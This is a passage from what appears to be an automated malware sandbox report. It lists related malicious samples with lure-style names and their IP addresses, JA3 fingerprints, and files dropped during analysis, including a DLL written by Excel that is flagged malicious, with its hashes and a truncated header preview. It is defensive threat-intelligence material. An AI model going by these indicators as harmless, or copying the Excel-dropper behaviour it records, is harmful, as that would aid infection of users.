                                                                                                                                                            • 192.185.164.148
                                                                                                                                                            Rq0Y7HegCd.exeGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.62.54
                                                                                                                                                            Banco Santander Copia de pago.docGet hashmaliciousBrowse
                                                                                                                                                            • 162.144.79.7
                                                                                                                                                            PO_0187.exeGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.218.79
                                                                                                                                                            SecuriteInfo.com.TrojanSpy.MSIL.AgentTesla.ee9ddc65.25172.exeGet hashmaliciousBrowse
                                                                                                                                                            • 192.185.164.148
                                                                                                                                                            SWIFT Ref No TT 00189330982 pdf.exeGet hashmaliciousBrowse
                                                                                                                                                            • 192.185.171.219
                                                                                                                                                            Invoice_1980.exeGet hashmaliciousBrowse
                                                                                                                                                            • 192.185.164.148
                                                                                                                                                            Ordine 6809 020621.exeGet hashmaliciousBrowse
                                                                                                                                                            • 108.167.141.137
                                                                                                                                                            Gift Card 0796907.xlsbGet hashmaliciousBrowse
                                                                                                                                                            • 162.144.57.183
                                                                                                                                                            Gift Card 0796907.xlsbGet hashmaliciousBrowse
                                                                                                                                                            • 162.144.57.183
                                                                                                                                                            Gift Card 0796907.xlsbGet hashmaliciousBrowse
                                                                                                                                                            • 162.144.57.183
                                                                                                                                                            Gift 7333663.xlsbGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.96.85
                                                                                                                                                            vv.xlsbGet hashmaliciousBrowse
                                                                                                                                                            • 162.214.186.5
                                                                                                                                                            vv.xlsbGet hashmaliciousBrowse
                                                                                                                                                            • 162.214.186.5
                                                                                                                                                            ALLEGHENYHEALTHNETWORKUSgrezVgW6gx.exeGet hashmaliciousBrowse
                                                                                                                                                            • 165.232.181.86
                                                                                                                                                            rixXmiPteY.exeGet hashmaliciousBrowse
                                                                                                                                                            • 165.232.181.86
                                                                                                                                                            ibj3mCisBP.exeGet hashmaliciousBrowse
                                                                                                                                                            • 165.232.181.86
                                                                                                                                                            3a94.dllGet hashmaliciousBrowse
                                                                                                                                                            • 165.232.183.49
                                                                                                                                                            3b17.dllGet hashmaliciousBrowse
                                                                                                                                                            • 165.232.183.49
                                                                                                                                                            9b9dc.dllGet hashmaliciousBrowse
                                                                                                                                                            • 165.232.183.49
                                                                                                                                                            sMpor4yDdu.exeGet hashmaliciousBrowse
                                                                                                                                                            • 165.232.177.150
                                                                                                                                                            WesYhOA67u.exeGet hashmaliciousBrowse
                                                                                                                                                            • 165.232.177.148
                                                                                                                                                            06LzL8skNz.exeGet hashmaliciousBrowse
                                                                                                                                                            • 165.232.183.193
                                                                                                                                                            Jt8zMQzDO2.exeGet hashmaliciousBrowse
                                                                                                                                                            • 165.232.183.193
                                                                                                                                                            WCPcSoW6ZI.exeGet hashmaliciousBrowse
                                                                                                                                                            • 165.232.184.56
                                                                                                                                                            VD4V1nD2qq.exeGet hashmaliciousBrowse
                                                                                                                                                            • 165.232.184.56
                                                                                                                                                            PDFXCview.exeGet hashmaliciousBrowse
                                                                                                                                                            • 165.232.56.100
                                                                                                                                                            Quote.exeGet hashmaliciousBrowse
                                                                                                                                                            • 165.232.56.241
                                                                                                                                                            SyfoFC5d21.exeGet hashmaliciousBrowse
                                                                                                                                                            • 165.232.110.48
                                                                                                                                                            RNM56670112.exeGet hashmaliciousBrowse
                                                                                                                                                            • 165.232.36.60
                                                                                                                                                            RRUY44091239.exeGet hashmaliciousBrowse
                                                                                                                                                            • 165.232.36.60
                                                                                                                                                            http://165.232.53.33/chrgoo/index.htmlGet hashmaliciousBrowse
                                                                                                                                                            • 165.232.53.33
                                                                                                                                                            exploit.docGet hashmaliciousBrowse
                                                                                                                                                            • 165.232.122.138
                                                                                                                                                            Information_1598546901.docGet hashmaliciousBrowse
                                                                                                                                                            • 165.232.71.161

                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                            37f463bf4616ecd445d4a1937da06e19TFfv4hD2jx.exeGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.253.78
                                                                                                                                                            8L621QxNHv.exeGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.253.78
                                                                                                                                                            fG9WW97ssF.exeGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.253.78
                                                                                                                                                            DHL_PACKAGE_HD98232.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.253.78
                                                                                                                                                            Satinalma Siparisi Listesi.exeGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.253.78
                                                                                                                                                            po4rKwQaet.exeGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.253.78
                                                                                                                                                            BcpljzRiWJ.exeGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.253.78
                                                                                                                                                            Mh2FzBrd3m.exeGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.253.78
                                                                                                                                                            nanomalware.docGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.253.78
                                                                                                                                                            bDemJQO51z.xlsbGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.253.78
                                                                                                                                                            Ih5baTrZim.exeGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.253.78
                                                                                                                                                            Cmh_Fax-Message-3865.htmlGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.253.78
                                                                                                                                                            Jhy2YPMShA.exeGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.253.78
                                                                                                                                                            Copie de plata bancara.exeGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.253.78
                                                                                                                                                            Copie de plata bancara.exeGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.253.78
                                                                                                                                                            FAX.HTMLGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.253.78
                                                                                                                                                            3MIvJieGXT.exeGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.253.78
                                                                                                                                                            audit-1007245983.xlsbGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.253.78
                                                                                                                                                            ztr3AvK8Oq.exeGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.253.78
                                                                                                                                                            tCgQxi2KmS.exeGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.253.78

                                                                                                                                                            Dropped Files

                                                                                                                                                            No context

                                                                                                                                                            Created / dropped Files

                                                                                                                                                            C:\Users\Public\Documents\decrypt.dll
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):455680
                                                                                                                                                            Entropy (8bit):6.751938575699122
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12288:AmYDWUbdfyU+H93bJ3aBGQIuSR35F5VBpx:yBbdfJsJqBG5VB/
                                                                                                                                                            MD5:F3BE390B01C85970DEEAE124CA36CE2D
                                                                                                                                                            SHA1:93114ECF1B2C711EC10E1FAFDC834393EFC11A97
                                                                                                                                                            SHA-256:4EEF8B6A5BCD808CD0AB0E33EFCEA2C2F9A36ABE556E56556DE8550383C9D3CE
                                                                                                                                                            SHA-512:463829E0A07A2983D967483D49DD478243658C0BE583BCDDB801CD45BEB869EEE8CDA812EA3A74E5CF5D70BE07B5A59677317DBADCEFDB8A21DE3DDCBE7FA3A6
                                                                                                                                                            Malicious:true
                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S....z.X.z.X.z.XL..Y.z.XL..Y.z.XL..Y.z.X...Y.z.X...Y.z.X...Y6z.X..kX.z.X.z.Xcz.X...Y.z.X...Y.z.X...Y.z.XRich.z.X................PE..L......^...........!................7.....................................................@.................................@................................p...#......T........................... ...@............................................text............................... ..`.rdata..p...........................@..@.data...............................@....reloc...#...p...$..................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5DCD6FF6-E03E-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:Microsoft Word Document
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):29272
                                                                                                                                                            Entropy (8bit):1.7715078128206818
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:Iw+Gcpr7GwpLN8G/ap8NYGIpcN8UGvnZpvN8WGo6qp9N8hGo4NpmN8gGWwAQGWaj:riZVZN+2N4WN8dtN84fN8SNMN8tUNrjB
                                                                                                                                                            MD5:AAFD082475A3FA2768778183CEE2850E
                                                                                                                                                            SHA1:F6608B80EAF7233A50DDF1375EAE827300F5E0A0
                                                                                                                                                            SHA-256:D114B9D0DA99FE585A9C15EF071D74FF7DBC739819CB702371A53C100CB3220A
                                                                                                                                                            SHA-512:9A48AC75962D7FB09926080A8757036B0BBD47D915ED41DE9825C6D9A628A5FB45E342575EDCD41C4FBC39612C888E36DAB32F1ED2E4C63E3E7082FA117A976B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{7879BAA2-E03E-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:Microsoft Word Document
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):120168
                                                                                                                                                            Entropy (8bit):2.2535850030479416
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:rgHHJMv0eUkzYfIf3pVsllhb75NLcCs6EVMLTATOz:ZvzElZro+
                                                                                                                                                            MD5:AF5C812B4D9A09EEBEEFBE547FCD3844
                                                                                                                                                            SHA1:DB30A7DF7E8CBA0F3635E06DE6575C695B10AB0F
                                                                                                                                                            SHA-256:E59951BB01F1D2DBB55BDE471FA7CCB363E9879EDB5032AA7E3588D92205FA7E
                                                                                                                                                            SHA-512:F4F2E4EADB40BE3719373C0E3A88FB0B620234AF9325036472D4C282D586187CFCF82FAFF5EEBF53AD59DE16170546F116799C231D4B1273525A59B947503E84
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5DCD6FF8-E03E-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:Microsoft Word Document
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):28148
                                                                                                                                                            Entropy (8bit):1.9172894757577383
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:rCZdQV6PkVjB2JWVaMlFepzz6cd1eOpzz6kA:r+iAMxw45TOrHJS
                                                                                                                                                            MD5:ED54374423511A130B6C7F70E51634B8
                                                                                                                                                            SHA1:2744C26F931D20C425AA2CDA96362DB72C2D8EE4
                                                                                                                                                            SHA-256:4293409833513E385CCD6D9E7BC421C645062643EFB9ED25E6C4D1D18E1472FA
                                                                                                                                                            SHA-512:76639BE112CC0C0E55C7763F137883227D129DB3631901B88A8DAB75DD958FDBDD5D000FDDA50A406B655C5B6D6118CDD39B599AE851D0DF888F027DCBF5C2B0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{7879BAA4-E03E-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:Microsoft Word Document
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):28148
                                                                                                                                                            Entropy (8bit):1.9207864501007292
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:rUZ7Qr6jBSDjZ2EW5MBFrdTY5dd1r/dTY5lA:rUZ7Qr6jkDjZ2EW5MBFNMdd1VMlA
                                                                                                                                                            MD5:A3A2174E4BEEBF9ACEE6A917DFE58C7C
                                                                                                                                                            SHA1:33FFE8E193DF001EF984C47A144148A31DCED4CF
                                                                                                                                                            SHA-256:6DA57020DEAE2361A87E28B29714047D5ED384E468F9E682D11F81A986B47ECF
                                                                                                                                                            SHA-512:68E0DAF1E5093E96248B1B570ADB9A8460B3B7CE2C4CB872127FA7212AA04850D54C959FB756C98EC807E07C4B6D875A05C77887E5414FD09209A3F3B962BD25
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{7879BAA6-E03E-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:Microsoft Word Document
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):28156
                                                                                                                                                            Entropy (8bit):1.9208052079408886
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:riZtQh6DkejR2WWcMIdiUmCIiJuliUmeUmCIiJNA:rey8IYANZE3Oi830Oic
                                                                                                                                                            MD5:0B513216BE62CF04377BFB78AF2FB033
                                                                                                                                                            SHA1:7DDC0EFE169655A8E42042F16B358E4640501542
                                                                                                                                                            SHA-256:901141D666CB5B0447B943A481610CC7D569368363784115138EB19808071358
                                                                                                                                                            SHA-512:BAB081FBC6FBADCF929D9C25872DCA16BC7988D03CC0CA9224C0D95CE3D2198EF4281BC9451CCA33AF1F4D4F0D6FA13AA8717317F7DC8E7578687F9958A0EF66
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{7879BAA8-E03E-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:Microsoft Word Document
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):28144
                                                                                                                                                            Entropy (8bit):1.9196947220972707
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:riZyQW6wBSrjF2dWWMCZ59Fut1S1599x9Fut0A:riZyQW6wkrjF2dWWMCZ5Wy15pWSA
                                                                                                                                                            MD5:7E9E57AAF045A952E0B0559FCAF26878
                                                                                                                                                            SHA1:2C0449F865C5EFD6124F87884CECBC5B03B0AB3C
                                                                                                                                                            SHA-256:63F65CED138E3DC528136010881E304108EDAA83A9D1AC22796ED9EA9E371054
                                                                                                                                                            SHA-512:0858D0B9638B8FBC0B712E76DA0FC7C25D18F4703F76B1C59963A128F81A736C7749F975DD74C0B08E7E23D19B7DF3A7E8363946C8E6C37AA783CEF3DC64D211
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{7879BAAA-E03E-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:Microsoft Word Document
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):28148
                                                                                                                                                            Entropy (8bit):1.9192988666458124
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:r3ZgQE6OBSxjt2pWqMSFnXN2l9S5d1n9XN2l9SXA:r3ZgQE6Okxjt2pWqMSFXUy5d1FUyXA
                                                                                                                                                            MD5:D522B3AA351CCC731B023D0868FCD450
                                                                                                                                                            SHA1:D58CD2A468F6636DA0735500188A8DC7A31DF65C
                                                                                                                                                            SHA-256:585B9E3F9E541EDB499CAC51579AE518A7D8A8620EAD2EAF1EFBB3B410E11C52
                                                                                                                                                            SHA-512:FA8A43DC85369E24CC4C7691A4F6BD5C48CD9462A61304DEC391223BB18DD80063ABA4C28667D542A6612560647B8A6B8365EB80E606652399665EBECA6FD92B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{7879BAAC-E03E-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:Microsoft Word Document
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):28172
                                                                                                                                                            Entropy (8bit):1.925227833078679
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:rUZTQb6Vk/jh2dWdM1tF12AHTTNk6tTlF12AHR12AHTTNk6tuA:rEcee7Q0u7n2AHnNbtZn2AHj2AHnNbtJ
                                                                                                                                                            MD5:EA707C8E29A33783E7714DDA936A6482
                                                                                                                                                            SHA1:6C033200001FEF5CE739C230A8B4F0D35272EC5A
                                                                                                                                                            SHA-256:7BAB32166C9B720E975784A0D20D29E7A283710166AFA9BA6AAB2A2D6F1CD6C2
                                                                                                                                                            SHA-512:C63B113B2C98E82D1533907B3E8806BF7152E81FDD6A3BC47E6DE8E4B17ABE93F2EE8737FF0F7C239B928B97811FBD4FB5521560711F66BB6CB5C163C698B5B2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):656
                                                                                                                                                            Entropy (8bit):5.146197797552912
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:TMHdNMNxOEiHP9HPAnWimI002EtM3MHdNMNxOEiHP9HPAnWimI00ObVbkEtMb:2d6NxOLPRPASZHKd6NxOLPRPASZ76b
                                                                                                                                                            MD5:F76485029FC4D51ED000A71E2D921677
                                                                                                                                                            SHA1:AB5DE9BC6DC6687110ACE30E45E78A7D6B5B2C14
                                                                                                                                                            SHA-256:06CE8BBA607FC68C3387149257A9D9EA7BF5DCAD102F1832A7855F18BA8EF7BB
                                                                                                                                                            SHA-512:49E65EC5F1317F7E5846EFC139EA850E47D493ED5FB37A188EE5C8F0A842B537092A3352B127B5B4C4AA71E7C242649B299408F41CD08D6674F864173E953C86
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):653
                                                                                                                                                            Entropy (8bit):5.152356522543803
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:TMHdNMNxe2kBHPmHPAnWimI002EtM3MHdNMNxe2kBHPmHPAnWimI00Obkak6EtMb:2d6NxrOPsPASZHKd6NxrOPsPASZ7Aa7b
                                                                                                                                                            MD5:F432DD266A0B5AA4C4205FA62766D1DC
                                                                                                                                                            SHA1:D52025B91E0616A99C1D89BE069BD4AB5B552F72
                                                                                                                                                            SHA-256:E5BB1A8751CAE9776C9E3DDC37AAF3BD1F8108D34459A4E27FAC794D1069931F
                                                                                                                                                            SHA-512:CBA479714BDBD445DC77FB1DE97E16FFF5B5A82D166469AB07F0A29EB0ED036695108AE592FE13AC7D51DA7ACFDD603DAC46207815E3E56AFA619EB7172D233A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x356d8606,0x01d7744b</date><accdate>0x356d8606,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x356d8606,0x01d7744b</date><accdate>0x356d8606,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):662
                                                                                                                                                            Entropy (8bit):5.165732408111604
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:TMHdNMNxvLiHP9HPAnWimI002EtM3MHdNMNxvLiHP9HPAnWimI00ObmZEtMb:2d6NxvkPRPASZHKd6NxvkPRPASZ7mb
                                                                                                                                                            MD5:7F83B8E29E376568823D4452E4DF32DE
                                                                                                                                                            SHA1:11B0F37B6192D02724341CE10AD5EB489ED8F9C9
                                                                                                                                                            SHA-256:B5ADA2D7D5D7A468A62E659662E10C36876338BAAD0E7202B4569C57E61D2050
                                                                                                                                                            SHA-512:5421CDBD73433F3BFEC690259C8CE001DFCDEFF889921F7EBC61A2EA1DE559349F44945797D5B189B156E1669FBC7B74F8488EC2B1CE48934C4C22FBC43B8DAE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):647
                                                                                                                                                            Entropy (8bit):5.1626781975834435
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:TMHdNMNxiiHP9HPAnWimI002EtM3MHdNMNxiiHP9HPAnWimI00Obd5EtMb:2d6NxlPRPASZHKd6NxlPRPASZ7Jjb
                                                                                                                                                            MD5:74D4581F7014B22CC25A8028824D5535
                                                                                                                                                            SHA1:553BF507C0D4DA936063C99BF1A77E03A7D088DB
                                                                                                                                                            SHA-256:A635AD60F47FC9E1F5DFCCC476008D99047B8C5B60B6CD1C5DBF4FD795E3BED6
                                                                                                                                                            SHA-512:675BCB45EAE4B7A40D51B90EB9B0D69E13737897BAB070988C4AF59D62914EA53C1B295FB3A2C611A6A5256A91C038B95B6858544A0226F1314AB1AABD2749D6
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):656
                                                                                                                                                            Entropy (8bit):5.1772982971017845
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:TMHdNMNxhGwiHP9HPAnWimI002EtM3MHdNMNxhGwiHP9HPAnWimI00Ob8K075Ety:2d6NxQ/PRPASZHKd6NxQ/PRPASZ7YKa/
                                                                                                                                                            MD5:ACA8AE0B58705E0C5084DEBF232D41D8
                                                                                                                                                            SHA1:816C94356880740F9A42D7153FDAA0171278F0B7
                                                                                                                                                            SHA-256:D5A756E2B28349FD5AFB3D71B6F9A718D4206BB4A1A0C8E87528798AEF579A33
                                                                                                                                                            SHA-512:A92B7176118B0C3C4B15AB6740FE2D86041345343C6F41EC5AA9A4983ABF6768E7116A122D6ADE5DE4985D9A1D503AB38C4243027702890049D9A623FAAC0644
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):653
                                                                                                                                                            Entropy (8bit):5.149606845977576
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:TMHdNMNx0niHP9HPAnWimI002EtM3MHdNMNx0niHP9HPAnWimI00ObxEtMb:2d6Nx0IPRPASZHKd6Nx0IPRPASZ7nb
                                                                                                                                                            MD5:68E59FC6C72262D7F1CF539CAB32FEA9
                                                                                                                                                            SHA1:9D8C50D3263CC4DADF40A67D1C3286FB72826915
                                                                                                                                                            SHA-256:281B190131D55C2CE519EE5A3E600B77BD623A2BE37D1C5040649A691F9E6883
                                                                                                                                                            SHA-512:BDFC78821D308AA9C510F66B89CFCFA93EE43DB50494E2F1ABBBD8000400AA1B5AEF6B839217BA58D182D679CB54AB2C3E39C1E2B5BD2DFD7EF34D7AC9F2A312
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):656
                                                                                                                                                            Entropy (8bit):5.186621498823608
